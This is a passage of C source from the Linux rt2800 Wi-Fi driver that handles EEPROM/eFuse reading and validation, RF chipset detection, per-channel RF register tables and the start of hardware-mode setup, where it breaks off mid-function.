	*(u32 *)&rt2x00dev->eeprom[i] = cpu_to_le32(reg);
	rt2800_register_read_lock(rt2x00dev, efuse_data2_reg, &reg);
	*(u32 *)&rt2x00dev->eeprom[i + 2] = cpu_to_le32(reg);
	rt2800_register_read_lock(rt2x00dev, efuse_data1_reg, &reg);
	*(u32 *)&rt2x00dev->eeprom[i + 4] = cpu_to_le32(reg);
	rt2800_register_read_lock(rt2x00dev, efuse_data0_reg, &reg);
	*(u32 *)&rt2x00dev->eeprom[i + 6] = cpu_to_le32(reg);

	mutex_unlock(&rt2x00dev->csr_mutex);
}
/*
 * rt2800_read_eeprom_efuse - fill the whole eeprom cache from eFuse.
 *
 * Walks the EEPROM word space in steps of 8 words (one eFuse block per
 * rt2800_efuse_read call).  Always returns 0.
 */
int rt2800_read_eeprom_efuse(struct rt2x00_dev *rt2x00dev)
{
	unsigned int word = 0;

	while (word < EEPROM_SIZE / sizeof(u16)) {
		rt2800_efuse_read(rt2x00dev, word);
		word += 8;
	}

	return 0;
}
EXPORT_SYMBOL_GPL(rt2800_read_eeprom_efuse);
/*
 * rt2800_get_txmixer_gain_24g - 2.4 GHz TX mixer gain from EEPROM.
 *
 * Returns 0 for RT3593 and for unprogrammed EEPROM words (low byte all
 * ones); otherwise returns the EEPROM_TXMIXER_GAIN_BG_VAL field.
 */
static u8 rt2800_get_txmixer_gain_24g(struct rt2x00_dev *rt2x00dev)
{
	u16 eeprom;

	if (rt2x00_rt(rt2x00dev, RT3593))
		return 0;

	rt2800_eeprom_read(rt2x00dev, EEPROM_TXMIXER_GAIN_BG, &eeprom);
	if ((eeprom & 0x00ff) == 0x00ff)
		return 0;

	return rt2x00_get_field16(eeprom, EEPROM_TXMIXER_GAIN_BG_VAL);
}
/*
 * rt2800_get_txmixer_gain_5g - 5 GHz TX mixer gain from EEPROM.
 *
 * Returns 0 for RT3593 and for unprogrammed EEPROM words (low byte all
 * ones); otherwise returns the EEPROM_TXMIXER_GAIN_A_VAL field.
 */
static u8 rt2800_get_txmixer_gain_5g(struct rt2x00_dev *rt2x00dev)
{
	u16 eeprom;

	if (rt2x00_rt(rt2x00dev, RT3593))
		return 0;

	rt2800_eeprom_read(rt2x00dev, EEPROM_TXMIXER_GAIN_A, &eeprom);
	if ((eeprom & 0x00ff) == 0x00ff)
		return 0;

	return rt2x00_get_field16(eeprom, EEPROM_TXMIXER_GAIN_A_VAL);
}
/*
 * rt2800_validate_eeprom - read the EEPROM and sanitize its contents.
 *
 * Replaces invalid values with sensible defaults: random MAC address,
 * default antenna/RF configuration, LED settings, clamped RSSI offsets
 * (|offset| <= 10) and default LNA gains.  During LNA validation lna0
 * is used as the reference value; EEPROM_LNA itself is never validated.
 *
 * Returns 0 on success, or the error from rt2800_read_eeprom().
 *
 * Fix: in the RT3593 EXT_LNA2 branch the A2 check wrote its default
 * into EEPROM_EXT_LNA2_A1 (copy-paste bug), leaving an invalid A2 gain
 * untouched and clobbering the already-validated A1 value.  It now
 * writes EEPROM_EXT_LNA2_A2.
 */
static int rt2800_validate_eeprom(struct rt2x00_dev *rt2x00dev)
{
	struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
	u16 word;
	u8 *mac;
	u8 default_lna_gain;
	int retval;

	/*
	 * Read the EEPROM.
	 */
	retval = rt2800_read_eeprom(rt2x00dev);
	if (retval)
		return retval;

	/*
	 * Start validation of the data that has been read.
	 */
	mac = rt2800_eeprom_addr(rt2x00dev, EEPROM_MAC_ADDR_0);
	if (!is_valid_ether_addr(mac)) {
		eth_random_addr(mac);
		rt2x00_eeprom_dbg(rt2x00dev, "MAC: %pM\n", mac);
	}

	rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF0, &word);
	if (word == 0xffff) {
		/* Unprogrammed word: default to 2 RX / 1 TX paths, RF2820 */
		rt2x00_set_field16(&word, EEPROM_NIC_CONF0_RXPATH, 2);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF0_TXPATH, 1);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF0_RF_TYPE, RF2820);
		rt2800_eeprom_write(rt2x00dev, EEPROM_NIC_CONF0, word);
		rt2x00_eeprom_dbg(rt2x00dev, "Antenna: 0x%04x\n", word);
	} else if (rt2x00_rt(rt2x00dev, RT2860) ||
		   rt2x00_rt(rt2x00dev, RT2872)) {
		/*
		 * There is a max of 2 RX streams for RT28x0 series
		 */
		if (rt2x00_get_field16(word, EEPROM_NIC_CONF0_RXPATH) > 2)
			rt2x00_set_field16(&word, EEPROM_NIC_CONF0_RXPATH, 2);
		rt2800_eeprom_write(rt2x00dev, EEPROM_NIC_CONF0, word);
	}

	rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1, &word);
	if (word == 0xffff) {
		/* Unprogrammed word: clear all capability bits */
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_HW_RADIO, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_EXTERNAL_TX_ALC, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_EXTERNAL_LNA_2G, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_EXTERNAL_LNA_5G, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_CARDBUS_ACCEL, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_BW40M_SB_2G, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_BW40M_SB_5G, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_WPS_PBC, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_BW40M_2G, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_BW40M_5G, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_BROADBAND_EXT_LNA, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_ANT_DIVERSITY, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_INTERNAL_TX_ALC, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_BT_COEXIST, 0);
		rt2x00_set_field16(&word, EEPROM_NIC_CONF1_DAC_TEST, 0);
		rt2800_eeprom_write(rt2x00dev, EEPROM_NIC_CONF1, word);
		rt2x00_eeprom_dbg(rt2x00dev, "NIC: 0x%04x\n", word);
	}

	rt2800_eeprom_read(rt2x00dev, EEPROM_FREQ, &word);
	if ((word & 0x00ff) == 0x00ff) {
		rt2x00_set_field16(&word, EEPROM_FREQ_OFFSET, 0);
		rt2800_eeprom_write(rt2x00dev, EEPROM_FREQ, word);
		rt2x00_eeprom_dbg(rt2x00dev, "Freq: 0x%04x\n", word);
	}
	if ((word & 0xff00) == 0xff00) {
		rt2x00_set_field16(&word, EEPROM_FREQ_LED_MODE,
				   LED_MODE_TXRX_ACTIVITY);
		rt2x00_set_field16(&word, EEPROM_FREQ_LED_POLARITY, 0);
		rt2800_eeprom_write(rt2x00dev, EEPROM_FREQ, word);
		rt2800_eeprom_write(rt2x00dev, EEPROM_LED_AG_CONF, 0x5555);
		rt2800_eeprom_write(rt2x00dev, EEPROM_LED_ACT_CONF, 0x2221);
		rt2800_eeprom_write(rt2x00dev, EEPROM_LED_POLARITY, 0xa9f8);
		rt2x00_eeprom_dbg(rt2x00dev, "Led Mode: 0x%04x\n", word);
	}

	/*
	 * During the LNA validation we are going to use
	 * lna0 as correct value. Note that EEPROM_LNA
	 * is never validated.
	 */
	rt2800_eeprom_read(rt2x00dev, EEPROM_LNA, &word);
	default_lna_gain = rt2x00_get_field16(word, EEPROM_LNA_A0);

	rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_BG, &word);
	if (abs(rt2x00_get_field16(word, EEPROM_RSSI_BG_OFFSET0)) > 10)
		rt2x00_set_field16(&word, EEPROM_RSSI_BG_OFFSET0, 0);
	if (abs(rt2x00_get_field16(word, EEPROM_RSSI_BG_OFFSET1)) > 10)
		rt2x00_set_field16(&word, EEPROM_RSSI_BG_OFFSET1, 0);
	rt2800_eeprom_write(rt2x00dev, EEPROM_RSSI_BG, word);

	drv_data->txmixer_gain_24g = rt2800_get_txmixer_gain_24g(rt2x00dev);

	rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_BG2, &word);
	if (abs(rt2x00_get_field16(word, EEPROM_RSSI_BG2_OFFSET2)) > 10)
		rt2x00_set_field16(&word, EEPROM_RSSI_BG2_OFFSET2, 0);
	if (!rt2x00_rt(rt2x00dev, RT3593)) {
		if (rt2x00_get_field16(word, EEPROM_RSSI_BG2_LNA_A1) == 0x00 ||
		    rt2x00_get_field16(word, EEPROM_RSSI_BG2_LNA_A1) == 0xff)
			rt2x00_set_field16(&word, EEPROM_RSSI_BG2_LNA_A1,
					   default_lna_gain);
	}
	rt2800_eeprom_write(rt2x00dev, EEPROM_RSSI_BG2, word);

	drv_data->txmixer_gain_5g = rt2800_get_txmixer_gain_5g(rt2x00dev);

	rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_A, &word);
	if (abs(rt2x00_get_field16(word, EEPROM_RSSI_A_OFFSET0)) > 10)
		rt2x00_set_field16(&word, EEPROM_RSSI_A_OFFSET0, 0);
	if (abs(rt2x00_get_field16(word, EEPROM_RSSI_A_OFFSET1)) > 10)
		rt2x00_set_field16(&word, EEPROM_RSSI_A_OFFSET1, 0);
	rt2800_eeprom_write(rt2x00dev, EEPROM_RSSI_A, word);

	rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_A2, &word);
	if (abs(rt2x00_get_field16(word, EEPROM_RSSI_A2_OFFSET2)) > 10)
		rt2x00_set_field16(&word, EEPROM_RSSI_A2_OFFSET2, 0);
	if (!rt2x00_rt(rt2x00dev, RT3593)) {
		if (rt2x00_get_field16(word, EEPROM_RSSI_A2_LNA_A2) == 0x00 ||
		    rt2x00_get_field16(word, EEPROM_RSSI_A2_LNA_A2) == 0xff)
			rt2x00_set_field16(&word, EEPROM_RSSI_A2_LNA_A2,
					   default_lna_gain);
	}
	rt2800_eeprom_write(rt2x00dev, EEPROM_RSSI_A2, word);

	if (rt2x00_rt(rt2x00dev, RT3593)) {
		rt2800_eeprom_read(rt2x00dev, EEPROM_EXT_LNA2, &word);
		if (rt2x00_get_field16(word, EEPROM_EXT_LNA2_A1) == 0x00 ||
		    rt2x00_get_field16(word, EEPROM_EXT_LNA2_A1) == 0xff)
			rt2x00_set_field16(&word, EEPROM_EXT_LNA2_A1,
					   default_lna_gain);
		if (rt2x00_get_field16(word, EEPROM_EXT_LNA2_A2) == 0x00 ||
		    rt2x00_get_field16(word, EEPROM_EXT_LNA2_A2) == 0xff)
			/* was EEPROM_EXT_LNA2_A1 - copy-paste bug fixed */
			rt2x00_set_field16(&word, EEPROM_EXT_LNA2_A2,
					   default_lna_gain);
		rt2800_eeprom_write(rt2x00dev, EEPROM_EXT_LNA2, word);
	}

	return 0;
}
/*
 * rt2800_init_eeprom - derive device capabilities from the EEPROM.
 *
 * Identifies the RF chipset, the default antenna configuration,
 * external LNA / HW radio button / BT coexistence capability flags,
 * the crystal frequency offset, LED settings and the EIRP TX power
 * limit, storing the results in @rt2x00dev.
 *
 * Returns 0 on success or -ENODEV for an unknown RF chipset.
 */
static int rt2800_init_eeprom(struct rt2x00_dev *rt2x00dev)
{
	u16 value;
	u16 eeprom;
	u16 rf;

	/*
	 * Read EEPROM word for configuration.
	 */
	rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF0, &eeprom);

	/*
	 * Identify RF chipset by EEPROM value
	 * RT28xx/RT30xx: defined in "EEPROM_NIC_CONF0_RF_TYPE" field
	 * RT53xx: defined in "EEPROM_CHIP_ID" field
	 */
	if (rt2x00_rt(rt2x00dev, RT3290) ||
	    rt2x00_rt(rt2x00dev, RT5390) ||
	    rt2x00_rt(rt2x00dev, RT5392))
		rt2800_eeprom_read(rt2x00dev, EEPROM_CHIP_ID, &rf);
	else
		rf = rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_RF_TYPE);

	/* Reject anything outside the list of supported RF chips */
	switch (rf) {
	case RF2820:
	case RF2850:
	case RF2720:
	case RF2750:
	case RF3020:
	case RF2020:
	case RF3021:
	case RF3022:
	case RF3052:
	case RF3053:
	case RF3070:
	case RF3290:
	case RF3320:
	case RF3322:
	case RF5360:
	case RF5362:
	case RF5370:
	case RF5372:
	case RF5390:
	case RF5392:
	case RF5592:
		break;
	default:
		rt2x00_err(rt2x00dev, "Invalid RF chipset 0x%04x detected\n",
			   rf);
		return -ENODEV;
	}

	rt2x00_set_rf(rt2x00dev, rf);

	/*
	 * Identify default antenna configuration.
	 */
	rt2x00dev->default_ant.tx_chain_num =
	    rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_TXPATH);
	rt2x00dev->default_ant.rx_chain_num =
	    rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_RXPATH);

	rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1, &eeprom);

	if (rt2x00_rt(rt2x00dev, RT3070) ||
	    rt2x00_rt(rt2x00dev, RT3090) ||
	    rt2x00_rt(rt2x00dev, RT3352) ||
	    rt2x00_rt(rt2x00dev, RT3390)) {
		/* Antenna selection from the EEPROM diversity field */
		value = rt2x00_get_field16(eeprom,
				EEPROM_NIC_CONF1_ANT_DIVERSITY);
		switch (value) {
		case 0:
		case 1:
		case 2:
			rt2x00dev->default_ant.tx = ANTENNA_A;
			rt2x00dev->default_ant.rx = ANTENNA_A;
			break;
		case 3:
			rt2x00dev->default_ant.tx = ANTENNA_A;
			rt2x00dev->default_ant.rx = ANTENNA_B;
			break;
		}
	} else {
		rt2x00dev->default_ant.tx = ANTENNA_A;
		rt2x00dev->default_ant.rx = ANTENNA_A;
	}

	if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390R)) {
		rt2x00dev->default_ant.tx = ANTENNA_HW_DIVERSITY; /* Unused */
		rt2x00dev->default_ant.rx = ANTENNA_HW_DIVERSITY; /* Unused */
	}

	/*
	 * Determine external LNA informations.
	 */
	if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_EXTERNAL_LNA_5G))
		__set_bit(CAPABILITY_EXTERNAL_LNA_A, &rt2x00dev->cap_flags);
	if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_EXTERNAL_LNA_2G))
		__set_bit(CAPABILITY_EXTERNAL_LNA_BG, &rt2x00dev->cap_flags);

	/*
	 * Detect if this device has an hardware controlled radio.
	 */
	if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_HW_RADIO))
		__set_bit(CAPABILITY_HW_BUTTON, &rt2x00dev->cap_flags);

	/*
	 * Detect if this device has Bluetooth co-existence.
	 */
	if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_BT_COEXIST))
		__set_bit(CAPABILITY_BT_COEXIST, &rt2x00dev->cap_flags);

	/*
	 * Read frequency offset and RF programming sequence.
	 */
	rt2800_eeprom_read(rt2x00dev, EEPROM_FREQ, &eeprom);
	rt2x00dev->freq_offset = rt2x00_get_field16(eeprom, EEPROM_FREQ_OFFSET);

	/*
	 * Store led settings, for correct led behaviour.
	 */
#ifdef CPTCFG_RT2X00_LIB_LEDS
	rt2800_init_led(rt2x00dev, &rt2x00dev->led_radio, LED_TYPE_RADIO);
	rt2800_init_led(rt2x00dev, &rt2x00dev->led_assoc, LED_TYPE_ASSOC);
	rt2800_init_led(rt2x00dev, &rt2x00dev->led_qual, LED_TYPE_QUALITY);

	/* EEPROM_FREQ word doubles as the MCU LED configuration */
	rt2x00dev->led_mcu_reg = eeprom;
#endif /* CPTCFG_RT2X00_LIB_LEDS */

	/*
	 * Check if support EIRP tx power limit feature.
	 */
	rt2800_eeprom_read(rt2x00dev, EEPROM_EIRP_MAX_TX_POWER, &eeprom);

	if (rt2x00_get_field16(eeprom, EEPROM_EIRP_MAX_TX_POWER_2GHZ) <
					EIRP_MAX_TX_POWER_LIMIT)
		__set_bit(CAPABILITY_POWER_LIMIT, &rt2x00dev->cap_flags);

	return 0;
}
/*
 * RF value list for rt28xx
 * Supports: 2.4 GHz (all) & 5.2 GHz (RF2850 & RF2750)
 *
 * Each entry is: channel number followed by four RF programming words
 * (see struct rf_channel).  Only the first 14 entries (2.4 GHz) are
 * used for RF2720/RF2820; the 5 GHz chips use the full table.
 */
static const struct rf_channel rf_vals[] = {
	{ 1,  0x18402ecc, 0x184c0786, 0x1816b455, 0x1800510b },
	{ 2,  0x18402ecc, 0x184c0786, 0x18168a55, 0x1800519f },
	{ 3,  0x18402ecc, 0x184c078a, 0x18168a55, 0x1800518b },
	{ 4,  0x18402ecc, 0x184c078a, 0x18168a55, 0x1800519f },
	{ 5,  0x18402ecc, 0x184c078e, 0x18168a55, 0x1800518b },
	{ 6,  0x18402ecc, 0x184c078e, 0x18168a55, 0x1800519f },
	{ 7,  0x18402ecc, 0x184c0792, 0x18168a55, 0x1800518b },
	{ 8,  0x18402ecc, 0x184c0792, 0x18168a55, 0x1800519f },
	{ 9,  0x18402ecc, 0x184c0796, 0x18168a55, 0x1800518b },
	{ 10, 0x18402ecc, 0x184c0796, 0x18168a55, 0x1800519f },
	{ 11, 0x18402ecc, 0x184c079a, 0x18168a55, 0x1800518b },
	{ 12, 0x18402ecc, 0x184c079a, 0x18168a55, 0x1800519f },
	{ 13, 0x18402ecc, 0x184c079e, 0x18168a55, 0x1800518b },
	{ 14, 0x18402ecc, 0x184c07a2, 0x18168a55, 0x18005193 },

	/* 802.11 UNI / HyperLan 2 */
	{ 36, 0x18402ecc, 0x184c099a, 0x18158a55, 0x180ed1a3 },
	{ 38, 0x18402ecc, 0x184c099e, 0x18158a55, 0x180ed193 },
	{ 40, 0x18402ec8, 0x184c0682, 0x18158a55, 0x180ed183 },
	{ 44, 0x18402ec8, 0x184c0682, 0x18158a55, 0x180ed1a3 },
	{ 46, 0x18402ec8, 0x184c0686, 0x18158a55, 0x180ed18b },
	{ 48, 0x18402ec8, 0x184c0686, 0x18158a55, 0x180ed19b },
	{ 52, 0x18402ec8, 0x184c068a, 0x18158a55, 0x180ed193 },
	{ 54, 0x18402ec8, 0x184c068a, 0x18158a55, 0x180ed1a3 },
	{ 56, 0x18402ec8, 0x184c068e, 0x18158a55, 0x180ed18b },
	{ 60, 0x18402ec8, 0x184c0692, 0x18158a55, 0x180ed183 },
	{ 62, 0x18402ec8, 0x184c0692, 0x18158a55, 0x180ed193 },
	{ 64, 0x18402ec8, 0x184c0692, 0x18158a55, 0x180ed1a3 },

	/* 802.11 HyperLan 2 */
	{ 100, 0x18402ec8, 0x184c06b2, 0x18178a55, 0x180ed783 },
	{ 102, 0x18402ec8, 0x184c06b2, 0x18578a55, 0x180ed793 },
	{ 104, 0x18402ec8, 0x185c06b2, 0x18578a55, 0x180ed1a3 },
	{ 108, 0x18402ecc, 0x185c0a32, 0x18578a55, 0x180ed193 },
	{ 110, 0x18402ecc, 0x184c0a36, 0x18178a55, 0x180ed183 },
	{ 112, 0x18402ecc, 0x184c0a36, 0x18178a55, 0x180ed19b },
	{ 116, 0x18402ecc, 0x184c0a3a, 0x18178a55, 0x180ed1a3 },
	{ 118, 0x18402ecc, 0x184c0a3e, 0x18178a55, 0x180ed193 },
	{ 120, 0x18402ec4, 0x184c0382, 0x18178a55, 0x180ed183 },
	{ 124, 0x18402ec4, 0x184c0382, 0x18178a55, 0x180ed193 },
	{ 126, 0x18402ec4, 0x184c0382, 0x18178a55, 0x180ed15b },
	{ 128, 0x18402ec4, 0x184c0382, 0x18178a55, 0x180ed1a3 },
	{ 132, 0x18402ec4, 0x184c0386, 0x18178a55, 0x180ed18b },
	{ 134, 0x18402ec4, 0x184c0386, 0x18178a55, 0x180ed193 },
	{ 136, 0x18402ec4, 0x184c0386, 0x18178a55, 0x180ed19b },
	{ 140, 0x18402ec4, 0x184c038a, 0x18178a55, 0x180ed183 },

	/* 802.11 UNII */
	{ 149, 0x18402ec4, 0x184c038a, 0x18178a55, 0x180ed1a7 },
	{ 151, 0x18402ec4, 0x184c038e, 0x18178a55, 0x180ed187 },
	{ 153, 0x18402ec4, 0x184c038e, 0x18178a55, 0x180ed18f },
	{ 157, 0x18402ec4, 0x184c038e, 0x18178a55, 0x180ed19f },
	{ 159, 0x18402ec4, 0x184c038e, 0x18178a55, 0x180ed1a7 },
	{ 161, 0x18402ec4, 0x184c0392, 0x18178a55, 0x180ed187 },
	{ 165, 0x18402ec4, 0x184c0392, 0x18178a55, 0x180ed197 },
	{ 167, 0x18402ec4, 0x184c03d2, 0x18179855, 0x1815531f },
	{ 169, 0x18402ec4, 0x184c03d2, 0x18179855, 0x18155327 },
	{ 171, 0x18402ec4, 0x184c03d6, 0x18179855, 0x18155307 },
	{ 173, 0x18402ec4, 0x184c03d6, 0x18179855, 0x1815530f },

	/* 802.11 Japan */
	{ 184, 0x15002ccc, 0x1500491e, 0x1509be55, 0x150c0a0b },
	{ 188, 0x15002ccc, 0x15004922, 0x1509be55, 0x150c0a13 },
	{ 192, 0x15002ccc, 0x15004926, 0x1509be55, 0x150c0a1b },
	{ 196, 0x15002ccc, 0x1500492a, 0x1509be55, 0x150c0a23 },
	{ 208, 0x15002ccc, 0x1500493a, 0x1509be55, 0x150c0a13 },
	{ 212, 0x15002ccc, 0x1500493e, 0x1509be55, 0x150c0a1b },
	{ 216, 0x15002ccc, 0x15004982, 0x1509be55, 0x150c0a23 },
};
/*
 * RF value list for rt3xxx
 * Supports: 2.4 GHz (all) & 5.2 GHz (RF3052 & RF3053)
 *
 * Each entry is: channel number followed by three RF programming words
 * (see struct rf_channel).
 */
static const struct rf_channel rf_vals_3x[] = {
	{1,  241, 2, 2 },
	{2,  241, 2, 7 },
	{3,  242, 2, 2 },
	{4,  242, 2, 7 },
	{5,  243, 2, 2 },
	{6,  243, 2, 7 },
	{7,  244, 2, 2 },
	{8,  244, 2, 7 },
	{9,  245, 2, 2 },
	{10, 245, 2, 7 },
	{11, 246, 2, 2 },
	{12, 246, 2, 7 },
	{13, 247, 2, 2 },
	{14, 248, 2, 4 },

	/* 802.11 UNI / HyperLan 2 */
	{36, 0x56, 0, 4},
	{38, 0x56, 0, 6},
	{40, 0x56, 0, 8},
	{44, 0x57, 0, 0},
	{46, 0x57, 0, 2},
	{48, 0x57, 0, 4},
	{52, 0x57, 0, 8},
	{54, 0x57, 0, 10},
	{56, 0x58, 0, 0},
	{60, 0x58, 0, 4},
	{62, 0x58, 0, 6},
	{64, 0x58, 0, 8},

	/* 802.11 HyperLan 2 */
	{100, 0x5b, 0, 8},
	{102, 0x5b, 0, 10},
	{104, 0x5c, 0, 0},
	{108, 0x5c, 0, 4},
	{110, 0x5c, 0, 6},
	{112, 0x5c, 0, 8},
	{116, 0x5d, 0, 0},
	{118, 0x5d, 0, 2},
	{120, 0x5d, 0, 4},
	{124, 0x5d, 0, 8},
	{126, 0x5d, 0, 10},
	{128, 0x5e, 0, 0},
	{132, 0x5e, 0, 4},
	{134, 0x5e, 0, 6},
	{136, 0x5e, 0, 8},
	{140, 0x5f, 0, 0},

	/* 802.11 UNII */
	{149, 0x5f, 0, 9},
	{151, 0x5f, 0, 11},
	{153, 0x60, 0, 1},
	{157, 0x60, 0, 5},
	{159, 0x60, 0, 7},
	{161, 0x60, 0, 9},
	{165, 0x61, 0, 1},
	{167, 0x61, 0, 3},
	{169, 0x61, 0, 5},
	{171, 0x61, 0, 7},
	{173, 0x61, 0, 9},
};
/* RT5592 channel table for devices with a 20 MHz crystal */
static const struct rf_channel rf_vals_5592_xtal20[] = {
	/* Channel, N, K, mod, R */
	{1, 482, 4, 10, 3},
	{2, 483, 4, 10, 3},
	{3, 484, 4, 10, 3},
	{4, 485, 4, 10, 3},
	{5, 486, 4, 10, 3},
	{6, 487, 4, 10, 3},
	{7, 488, 4, 10, 3},
	{8, 489, 4, 10, 3},
	{9, 490, 4, 10, 3},
	{10, 491, 4, 10, 3},
	{11, 492, 4, 10, 3},
	{12, 493, 4, 10, 3},
	{13, 494, 4, 10, 3},
	{14, 496, 8, 10, 3},
	{36, 172, 8, 12, 1},
	{38, 173, 0, 12, 1},
	{40, 173, 4, 12, 1},
	{42, 173, 8, 12, 1},
	{44, 174, 0, 12, 1},
	{46, 174, 4, 12, 1},
	{48, 174, 8, 12, 1},
	{50, 175, 0, 12, 1},
	{52, 175, 4, 12, 1},
	{54, 175, 8, 12, 1},
	{56, 176, 0, 12, 1},
	{58, 176, 4, 12, 1},
	{60, 176, 8, 12, 1},
	{62, 177, 0, 12, 1},
	{64, 177, 4, 12, 1},
	{100, 183, 4, 12, 1},
	{102, 183, 8, 12, 1},
	{104, 184, 0, 12, 1},
	{106, 184, 4, 12, 1},
	{108, 184, 8, 12, 1},
	{110, 185, 0, 12, 1},
	{112, 185, 4, 12, 1},
	{114, 185, 8, 12, 1},
	{116, 186, 0, 12, 1},
	{118, 186, 4, 12, 1},
	{120, 186, 8, 12, 1},
	{122, 187, 0, 12, 1},
	{124, 187, 4, 12, 1},
	{126, 187, 8, 12, 1},
	{128, 188, 0, 12, 1},
	{130, 188, 4, 12, 1},
	{132, 188, 8, 12, 1},
	{134, 189, 0, 12, 1},
	{136, 189, 4, 12, 1},
	{138, 189, 8, 12, 1},
	{140, 190, 0, 12, 1},
	{149, 191, 6, 12, 1},
	{151, 191, 10, 12, 1},
	{153, 192, 2, 12, 1},
	{155, 192, 6, 12, 1},
	{157, 192, 10, 12, 1},
	{159, 193, 2, 12, 1},
	{161, 193, 6, 12, 1},
	{165, 194, 2, 12, 1},
	{184, 164, 0, 12, 1},
	{188, 164, 4, 12, 1},
	{192, 165, 8, 12, 1},
	{196, 166, 0, 12, 1},
};
/* RT5592 channel table for devices with a 40 MHz crystal */
static const struct rf_channel rf_vals_5592_xtal40[] = {
	/* Channel, N, K, mod, R */
	{1, 241, 2, 10, 3},
	{2, 241, 7, 10, 3},
	{3, 242, 2, 10, 3},
	{4, 242, 7, 10, 3},
	{5, 243, 2, 10, 3},
	{6, 243, 7, 10, 3},
	{7, 244, 2, 10, 3},
	{8, 244, 7, 10, 3},
	{9, 245, 2, 10, 3},
	{10, 245, 7, 10, 3},
	{11, 246, 2, 10, 3},
	{12, 246, 7, 10, 3},
	{13, 247, 2, 10, 3},
	{14, 248, 4, 10, 3},
	{36, 86, 4, 12, 1},
	{38, 86, 6, 12, 1},
	{40, 86, 8, 12, 1},
	{42, 86, 10, 12, 1},
	{44, 87, 0, 12, 1},
	{46, 87, 2, 12, 1},
	{48, 87, 4, 12, 1},
	{50, 87, 6, 12, 1},
	{52, 87, 8, 12, 1},
	{54, 87, 10, 12, 1},
	{56, 88, 0, 12, 1},
	{58, 88, 2, 12, 1},
	{60, 88, 4, 12, 1},
	{62, 88, 6, 12, 1},
	{64, 88, 8, 12, 1},
	{100, 91, 8, 12, 1},
	{102, 91, 10, 12, 1},
	{104, 92, 0, 12, 1},
	{106, 92, 2, 12, 1},
	{108, 92, 4, 12, 1},
	{110, 92, 6, 12, 1},
	{112, 92, 8, 12, 1},
	{114, 92, 10, 12, 1},
	{116, 93, 0, 12, 1},
	{118, 93, 2, 12, 1},
	{120, 93, 4, 12, 1},
	{122, 93, 6, 12, 1},
	{124, 93, 8, 12, 1},
	{126, 93, 10, 12, 1},
	{128, 94, 0, 12, 1},
	{130, 94, 2, 12, 1},
	{132, 94, 4, 12, 1},
	{134, 94, 6, 12, 1},
	{136, 94, 8, 12, 1},
	{138, 94, 10, 12, 1},
	{140, 95, 0, 12, 1},
	{149, 95, 9, 12, 1},
	{151, 95, 11, 12, 1},
	{153, 96, 1, 12, 1},
	{155, 96, 3, 12, 1},
	{157, 96, 5, 12, 1},
	{159, 96, 7, 12, 1},
	{161, 96, 9, 12, 1},
	{165, 97, 1, 12, 1},
	{184, 82, 0, 12, 1},
	{188, 82, 4, 12, 1},
	{192, 82, 8, 12, 1},
	{196, 83, 0, 12, 1},
};
static int rt2800_probe_hw_mode(struct rt2x00_dev *rt2x00dev)
{
struct hw_mode_spec *spec = &rt2x00dev->spec;
struct channel_info *info;
char *default_power1;
char *default_power2;
char *default_power3;
unsigned int i;
u32 reg;
/*
* Disable powersaving as default.
*/
rt2x00dev->hw->wiphy->flags &= ~WIPHY_FLAG_PS_ON_BY_DEFAULT;
/*
* Initialize all hw fields.
*/
ieee80211_hw_set(rt2x00dev->hw, SUPPORTS_HT_CCK_RATES);
ieee80211_hw_set(rt2x00dev->hw, REPORTS_TX_ACK_STATUS);
ieee80211_hw_set(rt2x00dev->hw, AMPDU_AGGREGATION);
ieee80211_hw_set(rt2x00dev->hw, PS_NULLFUNC_STACK);
ieee80211_hw_set(rt2x00dev->hw, SIGNAL_DBM);
ieee80211_hw_set(rt2x00dev->hw, SUPPORTS_PS);
/*
* Don't set IEEE80211_HW_HOST_BROADCAST_PS_BUFFERING for USB devices
* unless we are capable of sending the buffered frames out after the
* DTIM transmission using rt2x00lib_beacondone. This will send out
* multicast and broadcast traffic immediately instead of buffering it
* infinitly and thus dropping it after some time.
*/
if (!rt2x00_is_usb(rt2x00dev))
ieee80211_hw_set(rt2x00dev->hw, HOST_BROADCAST_PS_BUFFERING);
SET_IEEE80211_DEV(rt2x00dev->hw, rt2x00dev->dev);
SET_IEEE80211_PERM_ADDR(rt2x00dev->hw,
rt2800_eeprom_addr(rt2x00dev,
EEPROM_MAC_ADDR_0));
/*
* As rt2800 has a global fallback table we cannot specify
* more then one tx rate per frame but since the hw will
* try several rates (based on the fallback table) we should
* initialize max_report_rates to the maximum number of rates
* we are going to try. Otherwise mac80211 will truncate our
* reported tx rates and the rc algortihm will end up with
* incorrect data.
*/
rt2x00dev->hw->max_rates = 1;
rt2x00dev->hw->max_report_rates = 7;
rt2x00dev->hw->max_rate_tries = 1;
/*
* Initialize hw_mode information.
